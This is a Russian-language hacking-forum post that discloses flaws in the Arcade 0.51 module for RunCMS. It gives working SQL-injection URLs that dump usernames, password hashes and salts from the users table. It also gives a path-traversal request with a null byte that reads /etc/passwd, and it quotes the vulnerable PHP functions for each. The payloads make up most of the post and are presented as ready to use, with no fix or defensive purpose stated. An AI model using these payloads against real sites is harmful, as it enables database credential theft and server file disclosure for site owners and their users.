|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами:
10058786
Репутация:
4589
|
|
Arcade
Версия: 0.51
Уязвимый скрипт: index.php
Запрос: /modules/arcade/index.php?act=show_cat&cat_id=-1+union+select+1,pwdsalt,pass,4,uname,6,7,8,9,10,1 1,12,13,14,15+from+runcms_users%23
Уязвимый кусок кода:
PHP код:
switch($act)
{
case 'show_cat':
{
show_category($cat_id);
break;
}
...........
// /include/arcade_func.php
function _show_cat_games($cat_id)
{
global $db, $HTTP_GET_VARS, $options;
$sql = "SELECT * FROM ".$db->prefix('arcade_cats')." WHERE cat_id=$cat_id";
$res = $db->query($sql);
$catrow = $db->fetch_object($res);
$sql1 = "SELECT count(*) from ".$db->prefix('arcade_games')." WHERE cat_id=$cat_id AND active=1 order by gtitle";
$res1 = $db->query($sql1);
list($total_games) = $db->fetch_array($res1);
$pager = new PageNav($total_games, $options['games_per_page'], $HTTP_GET_VARS['start'], "start", "act=show_cat&cat_id=$cat_id");
$sql2 = "SELECT * from ".$db->prefix('arcade_games')." WHERE cat_id=$cat_id AND active=1 order by gtitle";
$res2 = $db->query($sql2, $options['games_per_page'], $HTTP_GET_VARS['start']);
if ($catrow->cat_info) { $boxstuff = "<center><h1>".$catrow->cat_info."</h1></center><br />";}
if ($pager->renderNav()) { $boxstuff .= "<center>".$pager->renderNav()."</center><br />";}
$title= _MD_DISPCAT.$catrow->cat_name;
while ($row = $db->fetch_object($res2))
{
$boxstuff .=_display_game_info($row);
}
if ($pager->renderNav()) { $boxstuff .= "<br /><center>".$pager->renderNav()."</center>";}
themecenterposts($title, $boxstuff);
}
Запрос: /modules/arcade/index.php?act=play_game&gid=-1+union+select+1,pwdsalt,3,4,uname,6,7,8,9,10,11,1 2,pass,14,15+from+runcms_users%23
Уязвимый кусок кода:
PHP код:
case 'play_game':
{
play_game($gid);
break;
}
.....
// /include/arcade_func.php
function play_game($gid)
{
......
swf_display($gid);
......
function swf_display($gid)
{
global $db;
$sql = "SELECT * from ".$db->prefix('arcade_games')." WHERE gid=".$gid;
$res = $db->query($sql);
Запрос: /modules/arcade/index.php?act=show_stats&gid=-1+union+select+pass,2+from+runcms_users%23
Уязвимый кусок кода:
PHP код:
case 'show_stats':
{
show_gamestats($gid);
break;
}
.......
function show_gamestats($gid)
{
OpenTable();
_display_gamestats($gid);
CloseTable();
}
.......
function _display_gamestats($gid)
{
global $db, $HTTP_POST_VARS, $xoopsUser, $options;;
$sql = "SELECT gtitle,highscore_type FROM ".$db->prefix('arcade_games')." WHERE gid=".$gid."";
$res = $db->query($sql);
Чтение произвольных файлов
Зависимость: magic_quotes = off
Запрос: /modules/arcade/index.php?act=download_game&game=/../../../../../../../../../../../../../../../../../../../etc/passwd%00
Уязвимый кусок кода:
PHP код:
case 'download_game':
{
download_game($game);
break;
}
.....
function download_game($game)
{
global $HTTP_POST_VARS, $xoopsUser;
$dir = XOOPS_ROOT_PATH."/modules/arcade/cache/tar/";
$file = $dir."game_".$game.".tar";
$dir2 = XOOPS_ROOT_PATH."/modules/arcade/tar/";
$file2 = $dir2."game_".$game.".tar";
if ( !@file_exists($file) && !@file_exists($file2) )
{
new_tar($game);
} else {
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: public");
header("Content-Description: File Transfer");
header('Content-type: application/x-tar');
$header="Content-Disposition: attachment; filename=game_".$game.".tar";
header($header );
header("Content-Transfer-Encoding: binary");
@readfile($file);
}
}
На этом закончу с этим модулем, дальше все те же скули ..
Последний раз редактировалось BlackSun; 27.02.2009 в 18:41..
|